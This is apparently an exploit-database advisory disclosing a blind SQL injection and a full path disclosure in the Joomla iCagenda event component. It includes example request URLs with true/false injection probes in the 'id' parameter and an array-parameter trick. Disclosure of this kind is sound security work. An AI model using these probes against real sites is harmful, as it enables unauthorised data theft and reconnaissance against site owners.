# Souhail Hammou - Independant Security Researcher & Penetration Tester . # Facebook : www.facebook.com/dark.puzzle.sec # E-mail : dark-puzzle@live.fr # Greetings to all moroccan researchers and white hats . ------------------------------------------------------------------------------ # Exploit Title: Joomla Component (com_icagenda) Multiple Vulnerabilities . # Author: Dark-Puzzle (Souhail Hammou) # Risk : Critical # Version: All Versions # Google Dork : N/A # Category: Webapps # Tested on: Windows Xp Sp2 Fr . # OSVDB ID : 85147 and 85148 . # OSVDB Links : http://osvdb.org/show/osvdb/85148 & http://osvdb.org/show/osvdb/85147 *************************************************************************************** Info : Icagenda is a New Component for Event Management with a calendar module. ---------------------------------------------------- I - Blind SQL Injection Vulnerability ---------------------------------------------------- Vulnerability : "id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of True and False Queries through SQL statements . Here the invisible content shows us that the target suffers from Blind SQL Injection Vulnerability . Example : server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False) ADMIN PANEL : http://target/administrator ----------------------------------------------------- II - Full Path Disclosure Vulnerability ----------------------------------------------------- The Full path can be retrieved using Array method [] in ItemID & id Parameters . Example : http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1Брой прочитания на тази страница: 990
Joomla iCagenda Component (id parameter) Multiple Vulnerabilities